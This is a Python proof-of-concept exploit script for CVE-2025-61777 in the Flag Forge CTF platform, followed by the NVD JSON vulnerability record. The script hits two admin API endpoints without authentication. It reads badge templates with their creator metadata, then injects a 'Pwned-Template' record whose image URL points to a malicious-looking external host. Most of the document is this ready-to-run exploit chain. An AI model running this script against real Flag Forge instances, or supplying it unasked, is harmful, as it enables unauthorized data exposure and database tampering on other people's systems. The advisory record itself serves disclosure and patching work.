CVE-2025-61777

# CVE-2025-61777 - Flag Forge Unauthenticated Badge Template Access PoC # Affected versions: Flag Forge 2.0.0 - 2.3.1 # Fixed in: Flag Forge 2.3.2 import requests import json TARGET_URL = "https://target-flagforge-instance.com" # Step 1: Exploit GET endpoint to retrieve all badge templates (no auth required) def exploit_get_badge_templates(): """ Exploits the missing authentication on GET /api/admin/badge-templates to retrieve all badge templates and sensitive metadata. """ endpoint = f"{TARGET_URL}/api/admin/badge-templates" print(f"[*] Sending unauthenticated GET request to {endpoint}") response = requests.get(endpoint) if response.status_code == 200: print(f"[+] Success! Retrieved badge templates (Status: {response.status_code})") templates = response.json() print(f"[+] Found {len(templates)} badge templates") # Extract and display sensitive metadata for template in templates: print(f"\n--- Badge Template ---") print(f" Name: {template.get('name', 'N/A')}") print(f" Created By: {template.get('createdBy', 'N/A')}") # Sensitive print(f" Created At: {template.get('createdAt', 'N/A')}") # Sensitive print(f" Updated At: {template.get('updatedAt', 'N/A')}") # Sensitive return templates else: print(f"[-] Failed. Status code: {response.status_code}") return None # Step 2: Exploit POST endpoint to create arbitrary badge templates def exploit_create_badge_template(): """ Exploits the missing authentication on POST /api/admin/badge-templates/create to inject arbitrary badge templates into the database. """ endpoint = f"{TARGET_URL}/api/admin/badge-templates/create" print(f"\n[*] Sending unauthenticated POST request to {endpoint}") # Malicious badge template payload payload = { "name": "Pwned-Template", "description": "Injected by CVE-2025-61777 exploit", "imageUrl": "https://malicious-site.com/payload.png", "criteria": {"type": "manual"} } headers = {"Content-Type": "application/json"} response = requests.post(endpoint, json=payload, headers=headers) if response.status_code in [200, 201]: print(f"[+] Success! Badge template created (Status: {response.status_code})") print(f"[+] Response: {response.text}") return True else: print(f"[-] Failed. Status code: {response.status_code}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-61777 - Flag Forge Unauth Badge Template Access") print("=" * 60) # Execute exploit chain templates = exploit_get_badge_templates() exploit_create_badge_template() print("\n[*] Exploit complete.")

{"cve": {"id": "CVE-2025-61777", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:08.127", "lastModified": "2025-10-30T13:53:37.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flag Forge is a Capture The Flag (CTF) platform. Starting in version 2.0.0 and prior to version 2.3.2, the `/api/admin/badge-templates` (GET) and `/api/admin/badge-templates/create` (POST) endpoints previously allowed access without authentication or authorization. This could have enabled unauthorized users to retrieve all badge templates and sensitive metadata (createdBy, createdAt, updatedAt) and/or create arbitrary badge templates in the database. This could lead to data exposure, database pollution, or abuse of the badge system. The issue has been fixed in FlagForge v2.3.2. GET, POST, UPDATE, and DELETE endpoints now require authentication. Authorization checks ensure only admins can access and modify badge templates. No reliable workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-306"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flagforge:flagforge:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndExcluding": "2.3.2", "matchCriteriaId": "E0175E93-CF73-4186-AAC1-5BB11D48F70F"}]}]}], "references": [{"url": "https://github.com/FlagForgeCTF/flagForge/commit/e2121c5fb7a512a49dcd875812c944265fb1a846", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-26rx-c53q-rjf9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}